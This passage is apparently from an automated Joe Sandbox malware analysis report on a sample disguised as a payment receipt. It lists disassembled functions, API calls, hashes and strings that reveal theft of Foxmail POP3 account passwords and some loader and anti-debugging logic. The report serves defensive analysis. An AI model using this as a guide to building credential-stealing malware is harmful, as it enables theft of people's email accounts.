                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                    • FindClose.KERNEL32(00000000), ref: 100011DB
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                    • String ID:
                                                    • API String ID: 1083526818-0
                                                    • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                    • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                    • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                    • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                    Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                      • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                      • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                      • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                      • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                      • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                    • lstrlenW.KERNEL32(?), ref: 100014C5
                                                    • lstrlenW.KERNEL32(?), ref: 100014E0
                                                    • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                    • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                    • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                    • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                    • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                    • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                    • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                    • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                    • String ID: )$Foxmail$ProgramFiles
                                                    • API String ID: 672098462-2938083778
                                                    • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                    • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                    • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                    • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                    Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                      • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                      • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                      • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                    • String ID:
                                                    • API String ID: 2099061454-0
                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                    • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                    • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                    Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 83 1000c82f-1000c833 80->83 81->80 82 1000c7c8-1000c7f6 call 1000c7e6 81->82 91 1000c7f8 82->91 92 1000c86c-1000c86e 82->92 85 1000c872 call 1000c877 83->85 86 1000c835-1000c83d GetModuleHandleA 83->86 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->83 93 1000c84e-1000c850 90->93 94 1000c7fa-1000c7fe 91->94 95 1000c85b-1000c85e 91->95 96 1000c870 92->96 97 1000c866-1000c86b 92->97 98 1000c852-1000c854 93->98 99 1000c856-1000c85a 93->99 102 1000c865 94->102 103 1000c800-1000c80b GetProcAddress 94->103 100 1000c85f-1000c860 GetProcAddress 95->100 96->90 97->92 98->100 99->95 100->102 102->97 103->80 104 1000c80d-1000c81a VirtualProtect 103->104 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                      • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                      • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                      • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                      • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                    • String ID:
                                                    • API String ID: 2099061454-0
                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                    • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                    • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                    Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 121 1000c85f-1000c865 GetProcAddress 119->121 120->121 124 1000c866-1000c86e 121->124 126 1000c870 124->126 126->117
                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                    • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                    • String ID:
                                                    • API String ID: 2152742572-0
                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                    • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                    • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

                                                    Non-executed Functions

                                                    Function 100060E2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID: *O"/
                                                    • API String ID: 3906539128-463055101
                                                    • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                    • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                    • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                    • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                    Function 10006580 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *O"/$.
                                                    • API String ID: 0-368595237
                                                    • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                    • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                    • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                    • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                    Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                    • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                    • ExitProcess.KERNEL32 ref: 10004AEE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                    • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                    • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                    • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                    Function 1000724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                    • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                    • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                    • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00
                                                    Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 136 1000173a-100017fe call 1000c030 call 10002c40 * 2 143 10001803 call 10001cca 136->143 144 10001808-1000180c 143->144 145 10001812-10001816 144->145 146 100019ad-100019b1 144->146 145->146 147 1000181c-10001837 call 10001ede 145->147 150 1000183d-10001845 147->150 151 1000199f-100019ac call 10001ee7 * 2 147->151 153 10001982-10001985 150->153 154 1000184b-1000184e 150->154 151->146 156 10001995-10001999 153->156 157 10001987 153->157 154->153 158 10001854-10001881 call 100044b0 * 2 call 10001db7 154->158 156->150 156->151 160 1000198a-1000198d call 10002c40 157->160 170 10001887-1000189f call 100044b0 call 10001db7 158->170 171 1000193d-10001943 158->171 166 10001992 160->166 166->156 170->171 187 100018a5-100018a8 170->187 173 10001945-10001947 171->173 174 1000197e-10001980 171->174 173->174 175 10001949-1000194b 173->175 174->160 177 10001961-1000197c call 100016aa 175->177 178 1000194d-1000194f 175->178 177->166 180 10001951-10001953 178->180 181 10001955-10001957 178->181 180->177 180->181 184 10001959-1000195b 181->184 185 1000195d-1000195f 181->185 184->177 184->185 185->174 185->177 188 100018c4-100018dc call 100044b0 call 10001db7 187->188 189 100018aa-100018c2 call 100044b0 call 10001db7 187->189 188->156 198 100018e2-1000193b call 100016aa call 100015da call 10002c40 * 2 188->198 189->188 189->198 198->156
                                                    APIs
                                                      • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                      • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                      • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                    • _strlen.LIBCMT ref: 10001855
                                                    • _strlen.LIBCMT ref: 10001869
                                                    • _strlen.LIBCMT ref: 1000188B
                                                    • _strlen.LIBCMT ref: 100018AE
                                                    • _strlen.LIBCMT ref: 100018C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _strlen$File$CopyCreateDelete
                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                    • API String ID: 3296212668-3023110444
                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                    • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                    • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                    Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                    • API String ID: 4218353326-230879103
                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                    • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                    • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                    Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 276 10007cc2-10007cd6 277 10007d44-10007d4c 276->277 278 10007cd8-10007cdd 276->278 280 10007d93-10007dab call 10007e35 277->280 281 10007d4e-10007d51 277->281 278->277 279 10007cdf-10007ce4 278->279 279->277 282 10007ce6-10007ce9 279->282 290 10007dae-10007db5 280->290 281->280 284 10007d53-10007d90 call 1000571e * 4 281->284 282->277 285 10007ceb-10007cf3 282->285 284->280 288 10007cf5-10007cf8 285->288 289 10007d0d-10007d15 285->289 288->289 292 10007cfa-10007d0c call 1000571e call 100090ba 288->292 295 10007d17-10007d1a 289->295 296 10007d2f-10007d43 call 1000571e * 2 289->296 293 10007dd4-10007dd8 290->293 294 10007db7-10007dbb 290->294 292->289 298 10007df0-10007dfc 293->298 299 10007dda-10007ddf 293->299 302 10007dd1 294->302 303 10007dbd-10007dc0 294->303 295->296 304 10007d1c-10007d2e call 1000571e call 100091b8 295->304 296->277 298->290 311 10007dfe-10007e0b call 1000571e 298->311 308 10007de1-10007de4 299->308 309 10007ded 299->309 302->293 303->302 313 10007dc2-10007dd0 call 1000571e * 2 303->313 304->296 308->309 316 10007de6-10007dec call 1000571e 308->316 309->298 313->302 316->309
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                    • _free.LIBCMT ref: 10007CFB
                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                    • _free.LIBCMT ref: 10007D1D
                                                    • _free.LIBCMT ref: 10007D32
                                                    • _free.LIBCMT ref: 10007D3D
                                                    • _free.LIBCMT ref: 10007D5F
                                                    • _free.LIBCMT ref: 10007D72
                                                    • _free.LIBCMT ref: 10007D80
                                                    • _free.LIBCMT ref: 10007D8B
                                                    • _free.LIBCMT ref: 10007DC3
                                                    • _free.LIBCMT ref: 10007DCA
                                                    • _free.LIBCMT ref: 10007DE7
                                                    • _free.LIBCMT ref: 10007DFF
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                    • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                    • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                    • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                    Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • _free.LIBCMT ref: 100059EA
                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                    • _free.LIBCMT ref: 100059F6
                                                    • _free.LIBCMT ref: 10005A01
                                                    • _free.LIBCMT ref: 10005A0C
                                                    • _free.LIBCMT ref: 10005A17
                                                    • _free.LIBCMT ref: 10005A22
                                                    • _free.LIBCMT ref: 10005A2D
                                                    • _free.LIBCMT ref: 10005A38
                                                    • _free.LIBCMT ref: 10005A43
                                                    • _free.LIBCMT ref: 10005A51
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4509884378.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000007.00000002.4509860233.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000007.00000002.4509884378.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_10000000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                    • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                    • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                    • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                    Function 10009492 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
